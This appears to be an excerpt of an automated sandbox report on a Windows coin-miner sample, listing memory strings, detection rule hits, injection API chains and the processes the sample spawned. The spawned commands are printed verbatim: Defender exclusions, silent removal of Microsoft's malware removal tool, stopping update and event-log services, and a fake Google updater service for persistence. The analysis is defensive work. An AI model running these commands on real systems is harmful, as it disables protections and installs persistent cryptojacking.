            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: lsass.exe, 00000022.00000002.2577979722.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: lsass.exe, 00000022.00000000.1388820584.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575794630.000002A290A88000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: lsass.exe, 00000022.00000002.2575965021.000002A290AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388858910.000002A290AC4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
            Source: lsass.exe, 00000022.00000002.2578503702.000002A29139C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578503702.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000003.1496236329.000002A2913F6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2577979722.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
            Source: lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
            Source: lsass.exe, 00000022.00000000.1388820584.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
            Source: lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0

            Spam, unwanted Advertisements and Ransom Demands

            Source: C:\Users\user\Desktop\file.exe File written: C:\Windows\System32\drivers\etc\hosts

            System Summary

            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
            Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BC28C8 NtEnumerateValueKey,NtEnumerateValueKey
            Source: C:\Windows\System32\lsass.exe Code function: 34_2_000002A29199202C NtQuerySystemInformation,StrCmpNIW
            Source: C:\Windows\System32\lsass.exe Code function: 34_2_000002A29199253C NtQueryDirectoryFileEx,GetFileType,StrCpyW
            Source: C:\Windows\System32\dwm.exe Code function: 41_2_00000283E0F428C8 NtEnumerateValueKey,NtEnumerateValueKey
            Source: C:\Windows\System32\dialer.exe Code function: 63_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle
            Source: C:\Windows\System32\dialer.exe Code function: 64_2_0000000140001394 NtQueryAttributesFile
            Source: C:\ProgramData\Google\Chrome\updater.exe File created: C:\Windows\TEMP\lwouyklykeoh.sys
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_1jmsi3d4.uxf.ps1
            Source: C:\Windows\System32\dialer.exe Code function: 25_2_000000014000226C
            Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400014D8
            Source: C:\Windows\System32\dialer.exe Code function: 25_2_0000000140002560
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BA38A8
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385B9D0E0
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385B91F2C
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BD44A8
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BCDCE0
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BC2B2C
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BFD0E0
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385C038A8
            Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BF1F2C
            Source: C:\Windows\System32\lsass.exe Code function: 34_2_000002A2911C1F2C
            Source: C:\Windows\System32\lsass.exe Code function: 34_2_000002A2911D38A8
            Source: C:\Windows\System32\lsass.exe Code function: 34_2_000002A2911CD0E0
            Source: C:\Windows\System32\lsass.exe Code function: 34_2_000002A291992B2C
            Source: C:\Windows\System32\lsass.exe Code function: 34_2_000002A2919A44A8
            Source: C:\Windows\System32\lsass.exe Code function: 34_2_000002A29199DCE0
            Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E255DD0E0
            Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E255E38A8
            Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E255D1F2C
            Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25EDDCE0
            Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25EE44A8
            Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25ED2B2C
            Source: C:\Windows\System32\dwm.exe Code function: 41_2_00000283E0F11F2C
            Source: C:\Windows\System32\dwm.exe Code function: 41_2_00000283E0F1D0E0
            Source: C:\Windows\System32\dwm.exe Code function: 41_2_00000283E0F238A8
            Source: C:\Windows\System32\dwm.exe Code function: 41_2_00000283E0F42B2C
            Source: C:\Windows\System32\dwm.exe Code function: 41_2_00000283E0F4DCE0
            Source: C:\Windows\System32\dwm.exe Code function: 41_2_00000283E0F544A8
            Source: C:\Windows\System32\dialer.exe Code function: 63_2_000000014000226C
            Source: C:\Windows\System32\dialer.exe Code function: 63_2_00000001400014D8
            Source: C:\Windows\System32\dialer.exe Code function: 63_2_0000000140002560
            Source: C:\Windows\System32\dialer.exe Code function: 64_2_0000000140003250
            Source: C:\Windows\System32\dialer.exe Code function: 64_2_00000001400027D0
            Source: C:\Windows\System32\svchost.exe Code function: 66_2_000001FB539A38A8
            Source: C:\Windows\System32\svchost.exe Code function: 66_2_000001FB5399D0E0
            Source: C:\Windows\System32\svchost.exe Code function: 66_2_000001FB53991F2C
            Source: C:\Windows\System32\svchost.exe Code function: 66_2_000001FB539D44A8
            Source: C:\Windows\System32\svchost.exe Code function: 66_2_000001FB539CDCE0
            Source: C:\Windows\System32\svchost.exe Code function: 66_2_000001FB539C2B2C
            Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001CBD8BB38A8
            Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001CBD8BAD0E0
            Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001CBD8BA1F2C
            Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001CBD8BE44A8
            Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001CBD8BDDCE0
            Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001CBD8BD2B2C
            Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001F2BD13D0E0
            Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001F2BD1438A8
            Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001F2BD131F2C
            Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001F2BD16DCE0
            Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001F2BD1744A8
            Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001F2BD162B2C
            Source: C:\Windows\System32\svchost.exe Code function: 69_2_00000229F8B71F2C
            Source: C:\Windows\System32\svchost.exe Code function: 69_2_00000229F8B838A8
            Source: C:\Windows\System32\svchost.exe Code function: 69_2_00000229F8B7D0E0
            Source: C:\Windows\System32\svchost.exe Code function: 69_2_00000229F8BA2B2C
            Source: C:\Windows\System32\svchost.exe Code function: 69_2_00000229F8BB44A8
            Source: C:\Windows\System32\svchost.exe Code function: 69_2_00000229F8BADCE0
            Source: Joe Sandbox View Dropped File: C:\ProgramData\Google\Chrome\updater.exe FDE56E00761A85AD495BD2D05654F3657922F665F58EDFABCF43D2FA769F0D79
            Source: Joe Sandbox View Dropped File: C:\Windows\Temp\lwouyklykeoh.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: classification engine Classification label: mal100.adwa.spyw.evad.mine.winEXE@90/13@1/2
            Source: C:\Windows\System32\dialer.exe Code function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
            Source: C:\Windows\System32\dialer.exe Code function: 63_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
            Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
            Source: C:\Windows\System32\dialer.exe Code function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8080:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7812:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8088:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8024:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8160:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7448:120:WilError_03
            Source: C:\Windows\System32\dialer.exe Mutant created: \BaseNamedObjects\Global\ihmypisetxdrqeze
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7764:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:344:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7972:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8152:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzv5kr52.ld5.ps1
            Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\ProgramData\Google\Chrome\updater.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
            Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
            Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown Process created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\Google\Chrome\updater.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
